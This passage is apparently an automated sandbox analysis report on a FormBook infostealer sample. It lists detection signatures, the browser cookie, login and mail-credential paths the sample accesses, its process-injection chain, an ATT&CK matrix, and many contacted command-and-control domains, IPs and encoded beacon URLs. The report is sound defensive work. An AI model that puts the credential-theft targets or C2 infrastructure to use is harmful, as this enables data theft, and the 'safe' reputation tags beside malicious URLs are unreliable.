            Source: 7RsDGpyOQk.exe, UJCHZIamnVz.exe, 00000003.00000000.1891847884.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162949347.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2035864523.0000000001830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: UJCHZIamnVz.exe, 00000003.00000000.1891847884.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162949347.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2035864523.0000000001830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: UJCHZIamnVz.exe, 00000003.00000000.1891847884.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162949347.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2035864523.0000000001830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: UJCHZIamnVz.exe, 00000003.00000000.1891847884.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162949347.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2035864523.0000000001830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001C886B cpuid 0_2_001C886B
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001D50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_001D50D7
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001E2230 GetUserNameW,0_2_001E2230
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001D418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_001D418A
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_001A4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001A4AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\subst.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\subst.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\subst.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: 7RsDGpyOQk.exeBinary or memory string: WIN_81
            Source: 7RsDGpyOQk.exeBinary or memory string: WIN_XP
            Source: 7RsDGpyOQk.exeBinary or memory string: WIN_XPe
            Source: 7RsDGpyOQk.exeBinary or memory string: WIN_VISTA
            Source: 7RsDGpyOQk.exeBinary or memory string: WIN_7
            Source: 7RsDGpyOQk.exeBinary or memory string: WIN_8
            Source: 7RsDGpyOQk.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00216596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00216596
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00216A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00216A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		1
            Masquerading            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Valid Accounts            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Virtualization/Sandbox Evasion            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
            Access Token Manipulation            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
            Process Injection            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466969 Sample: 7RsDGpyOQk.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 28 www.077551.xyz 2->28 30 www.ajjmamlllqqq.xyz 2->30 32 21 other IPs or domains 2->32 42 Snort IDS alert for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->46 50 5 other signatures 2->50 10 7RsDGpyOQk.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 UJCHZIamnVz.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 subst.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 UJCHZIamnVz.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.077551.xyz 104.21.84.69, 49754, 49755, 49756 CLOUDFLARENETUS United States 22->34 36 eoghenluire.com 76.223.105.230, 49738, 49739, 49740 AMAZON-02US United States 22->36 38 11 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            7RsDGpyOQk.exe79%ReversingLabsWin32.Trojan.Strab
            7RsDGpyOQk.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://js.users.51.la/21879113.js0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.costmoon.com/8g7d/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.n-ambu.com/2gp2/0%Avira URL Cloudsafe
            http://www.n-ambu.com/2gp2/?TvpPfhGp=Y99li2SS0jFkeE2dW5fsIsqznCbyzAVNDcc+JEah7Ezrvxte8MpPDgExvKgilbZfLMJ3frvQmAcJOgkNzzn64tqjGSAfcd+mGzUUslxnkGXz4OyUxuBjmso=&Y664G=SttDen9860%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%Avira URL Cloudsafe
            https://cdn.jqueryscdns.net/jquery-3.7.1.min.js0%Avira URL Cloudsafe
            http://www.qrdinamicos.com/ndwb/?TvpPfhGp=/qyS5uFMStFKGiC7gxlopLbluV61vu+RjDYXbeo3nHi2h/5APNXwWrEdkOsmqUKqQbrnCVB7EyQd8x04JYqB6drGuaM8rj1nd0RRI3hUZH7sElvU+ZecVtI=&Y664G=SttDen9860%Avira URL Cloudsafe
            https://track.uc.cn/collect0%Avira URL Cloudsafe
            http://www.114lala.net/ixzv/0%Avira URL Cloudsafe
            http://www.dudapolicarpo.online/8pbu/0%Avira URL Cloudsafe
            http://push.zhanzhang.baidu.com/push.js0%Avira URL Cloudsafe
            http://fedoraproject.org/0%Avira URL Cloudsafe
            http://nginx.net/0%Avira URL Cloudsafe
            http://www.costmoon.com/8g7d/?TvpPfhGp=rWbbvp+cwrqQgazA9nOhlKpoIaKdpvX3NtKjwAvzyCJ08CtHZWjUKOIyI7s4v/dodflG0NuedqdGjOxv5Uk5GEd+1aRY1dG/6xJxc0ee/cBS07/9XhY/WVk=&Y664G=SttDen9860%Avira URL Cloudsafe
            http://vendasnaweb1.com/j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI0%Avira URL Cloudsafe
            http://www.shabygreen.top/4n8t/0%Avira URL Cloudsafe
            http://www.immedu.website/p5xb/?TvpPfhGp=gZSYabCnKqSr1J4TudILkU7OUr6zW8quS0K3SSEWSlTvQpNCKBnGards6ZD8X7yXO9b/F0Vh3EPZ273HAe14Zo8L5xIdhoBu33QGrF37ZE8rNfV+CMbs4i4=&Y664G=SttDen9860%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?0%Avira URL Cloudsafe
            http://www.rodotest2.pro/50i6/0%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%Avira URL Cloudsafe
            http://www.vendasnaweb1.com/j5qz/0%Avira URL Cloudsafe
            http://www.g2m-os.com/42ua/?TvpPfhGp=666AcZt0vqUScrmitGmo0Sn7ionns3Mbllq+uEGn7nXx6ARBAUIN9tdRik4SosB3sd2YOi8W6KuCii1PvQhz+VFeXf3qlNf5sD8BLIsMKCpTeSvGwI45HLM=&Y664G=SttDen9860%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%Avira URL Cloudsafe
            http://www.ajjmamlllqqq.xyz/5uz4/0%Avira URL Cloudsafe
            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%Avira URL Cloudsafe
            http://www.rodotest2.pro0%Avira URL Cloudsafe
            http://www.shabygreen.top/4n8t/?TvpPfhGp=ghFc6znRteN4Ja3nQE93pb+klyhhNrAgC93ynk4+Lc8v1BQxlwgw+LzLUcq3fIz0ommJFFyvB0Z1ghBSVa+hRbhXI8cuWBtdWYqwziEG2BzJAupp88dDv3U=&Y664G=SttDen9860%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.rodotest2.pro/50i6/?TvpPfhGp=qitUcqUffP2yk+NlTcn0cnkOyWQfzTGozjE+fkR+cpfvqRoRQe0JJpYteZO1ejUj8Zcre8jv6/KV+/CxNuPp0r5bf+UIe/RIppbsiuOOAOzLhzD7OHcJ9fs=&Y664G=SttDen9860%Avira URL Cloudsafe
            https://zz.bdstatic.com/linksubmit/push.js0%Avira URL Cloudsafe
            http://www.ajjmamlllqqq.xyz/5uz4/?TvpPfhGp=dL4clO0CJrDMcIxu4IdYSuD/cDaqSVWvuwN44KEfTTu0on3tmzTjREisTNIHlk2ZlqA7xyFr2WD4XoYfHF4eAi4rK2PJMwuiV4L1panftdceIKli3LKULfU=&Y664G=SttDen9860%Avira URL Cloudsafe
            http://www.qrdinamicos.com/ndwb/0%Avira URL Cloudsafe
            http://www.dudapolicarpo.online/8pbu/?TvpPfhGp=kNNnEV5wtfMTk7EsKDdqofuXk+Rn8vJj2yYB/JV+5cekMazgA8cmAYXSGgFhL+XbvnxEPdo1Vtw1uTcXwhetC6FtU7s9g1m4smEVJIuSZwU+vhX8ycfAGhs=&Y664G=SttDen9860%Avira URL Cloudsafe
            http://www.eoghenluire.com/i3r0/?TvpPfhGp=2wwNf3uh0L74coHFwFoEwJLZZncz0eUv2PDbuROkov9Y0f520r30B60Dc6sw70wr8VqsfcnHqRGaEDIOfEcEM+xuD/kdVb8f6u/HqHihPox78cRvPoIrzf8=&Y664G=SttDen9860%Avira URL Cloudsafe
            http://www.077551.xyz/4ogj/0%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js0%Avira URL Cloudsafe
            http://www.eoghenluire.com/i3r0/0%Avira URL Cloudsafe
            http://www.114lala.net/ixzv/?TvpPfhGp=3oi8oJRBwbk3Fv7B4wkBwCYPdwSnFCWHmnvM7LB8bGn5gZyL3DPz3/FGAD+hTQwo1cQLx9Xf6C04wJsqCrUqebqL9pABwbW+sBk+bBPfLH9pAE6bRw2vg/E=&Y664G=SttDen9860%Avira URL Cloudsafe
            http://www.w25dn.top/axxb/0%Avira URL Cloudsafe
            http://www.vendasnaweb1.com/j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI+gpm/LVbhI65FVShh/tgBI/y9RfM7r0s9qzU65mo6yF4gvL+0acj1h9sdpnc2oWt6mPPUzfC6i0Cm604hOcmgozNJQF0xWBsyGELgFo=&Y664G=SttDen9860%Avira URL Cloudsafe
            https://f385xw.com/register0%Avira URL Cloudsafe
            http://www.g2m-os.com/42ua/0%Avira URL Cloudsafe
            http://www.w25dn.top/axxb/?TvpPfhGp=Tomi9JcGHwU5W62uuIED6rgr9HvHoI2i1WV2/yOG5tMyELYD9gbQrdSRvly679CAlYQP7KMM3mPFOKjE9n3WDNNFNlS8pk0/g6E2kBMo21yRC+YJoIsNK7I=&Y664G=SttDen9860%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.qrdinamicos.com
            		217.160.0.119
            		truefalse
              		unknown
              dudapolicarpo.online
              		162.240.81.18
              		truefalse
                		unknown
                www.077551.xyz
                		104.21.84.69
                		truetrue
                  		unknown
                  rodotest2.pro
                  		3.33.130.190
                  		truefalse
                    		unknown
                    www.114lala.net
                    		154.23.7.170
                    		truefalse
                      		unknown
                      www.shabygreen.top
                      		203.161.41.205
                      		truefalse
                        		unknown
                        vendasnaweb1.com
                        		162.241.2.92
                        		truefalse
                          		unknown
                          www.ajjmamlllqqq.xyz
                          		35.244.172.47
                          		truefalse
                            		unknown
                            w25dn.top
                            		38.47.232.185
                            		truefalse
                              		unknown
                              g2m-os.com
                              		3.33.130.190
                              		truefalse
                                		unknown
                                www.immedu.website
                                		185.106.178.60
                                		truefalse
                                  		unknown
                                  www.n-ambu.com
                                  		46.30.211.38
                                  		truefalse
                                    		unknown
                                    www.costmoon.com
                                    		74.208.236.38
                                    		truefalse
                                      		unknown
                                      pixie.porkbun.com
                                      		44.227.65.245
                                      		truefalse
                                        		unknown
                                        eoghenluire.com
                                        		76.223.105.230
                                        		truetrue
                                          		unknown
                                          www.eoghenluire.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.dudapolicarpo.online
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.voupeclients.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.vendasnaweb1.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.w25dn.top
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.indotop77.art
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.rodotest2.pro
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.g2m-os.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.n-ambu.com/2gp2/?TvpPfhGp=Y99li2SS0jFkeE2dW5fsIsqznCbyzAVNDcc+JEah7Ezrvxte8MpPDgExvKgilbZfLMJ3frvQmAcJOgkNzzn64tqjGSAfcd+mGzUUslxnkGXz4OyUxuBjmso=&Y664G=SttDen986false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.qrdinamicos.com/ndwb/?TvpPfhGp=/qyS5uFMStFKGiC7gxlopLbluV61vu+RjDYXbeo3nHi2h/5APNXwWrEdkOsmqUKqQbrnCVB7EyQd8x04JYqB6drGuaM8rj1nd0RRI3hUZH7sElvU+ZecVtI=&Y664G=SttDen986false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.costmoon.com/8g7d/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.n-ambu.com/2gp2/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.114lala.net/ixzv/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.dudapolicarpo.online/8pbu/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.immedu.website/p5xb/?TvpPfhGp=gZSYabCnKqSr1J4TudILkU7OUr6zW8quS0K3SSEWSlTvQpNCKBnGards6ZD8X7yXO9b/F0Vh3EPZ273HAe14Zo8L5xIdhoBu33QGrF37ZE8rNfV+CMbs4i4=&Y664G=SttDen986false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.shabygreen.top/4n8t/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.costmoon.com/8g7d/?TvpPfhGp=rWbbvp+cwrqQgazA9nOhlKpoIaKdpvX3NtKjwAvzyCJ08CtHZWjUKOIyI7s4v/dodflG0NuedqdGjOxv5Uk5GEd+1aRY1dG/6xJxc0ee/cBS07/9XhY/WVk=&Y664G=SttDen986false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.vendasnaweb1.com/j5qz/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.g2m-os.com/42ua/?TvpPfhGp=666AcZt0vqUScrmitGmo0Sn7ionns3Mbllq+uEGn7nXx6ARBAUIN9tdRik4SosB3sd2YOi8W6KuCii1PvQhz+VFeXf3qlNf5sD8BLIsMKCpTeSvGwI45HLM=&Y664G=SttDen986false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.rodotest2.pro/50i6/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.ajjmamlllqqq.xyz/5uz4/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.shabygreen.top/4n8t/?TvpPfhGp=ghFc6znRteN4Ja3nQE93pb+klyhhNrAgC93ynk4+Lc8v1BQxlwgw+LzLUcq3fIz0ommJFFyvB0Z1ghBSVa+hRbhXI8cuWBtdWYqwziEG2BzJAupp88dDv3U=&Y664G=SttDen986false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.ajjmamlllqqq.xyz/5uz4/?TvpPfhGp=dL4clO0CJrDMcIxu4IdYSuD/cDaqSVWvuwN44KEfTTu0on3tmzTjREisTNIHlk2ZlqA7xyFr2WD4XoYfHF4eAi4rK2PJMwuiV4L1panftdceIKli3LKULfU=&Y664G=SttDen986false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.rodotest2.pro/50i6/?TvpPfhGp=qitUcqUffP2yk+NlTcn0cnkOyWQfzTGozjE+fkR+cpfvqRoRQe0JJpYteZO1ejUj8Zcre8jv6/KV+/CxNuPp0r5bf+UIe/RIppbsiuOOAOzLhzD7OHcJ9fs=&Y664G=SttDen986false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.qrdinamicos.com/ndwb/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.dudapolicarpo.online/8pbu/?TvpPfhGp=kNNnEV5wtfMTk7EsKDdqofuXk+Rn8vJj2yYB/JV+5cekMazgA8cmAYXSGgFhL+XbvnxEPdo1Vtw1uTcXwhetC6FtU7s9g1m4smEVJIuSZwU+vhX8ycfAGhs=&Y664G=SttDen986false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.eoghenluire.com/i3r0/?TvpPfhGp=2wwNf3uh0L74coHFwFoEwJLZZncz0eUv2PDbuROkov9Y0f520r30B60Dc6sw70wr8VqsfcnHqRGaEDIOfEcEM+xuD/kdVb8f6u/HqHihPox78cRvPoIrzf8=&Y664G=SttDen986true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.077551.xyz/4ogj/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.w25dn.top/axxb/false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.114lala.net/ixzv/?TvpPfhGp=3oi8oJRBwbk3Fv7B4wkBwCYPdwSnFCWHmnvM7LB8bGn5gZyL3DPz3/FGAD+hTQwo1cQLx9Xf6C04wJsqCrUqebqL9pABwbW+sBk+bBPfLH9pAE6bRw2vg/E=&Y664G=SttDen986false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.vendasnaweb1.com/j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI+gpm/LVbhI65FVShh/tgBI/y9RfM7r0s9qzU65mo6yF4gvL+0acj1h9sdpnc2oWt6mPPUzfC6i0Cm604hOcmgozNJQF0xWBsyGELgFo=&Y664G=SttDen986false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.eoghenluire.com/i3r0/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.w25dn.top/axxb/?TvpPfhGp=Tomi9JcGHwU5W62uuIED6rgr9HvHoI2i1WV2/yOG5tMyELYD9gbQrdSRvly679CAlYQP7KMM3mPFOKjE9n3WDNNFNlS8pk0/g6E2kBMo21yRC+YJoIsNK7I=&Y664G=SttDen986false
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.g2m-os.com/42ua/false
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabsubst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jssubst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/ac/?q=subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://js.users.51.la/21879113.jssubst.exe, 00000004.00000002.4163884021.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003634000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B8C4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jssubst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
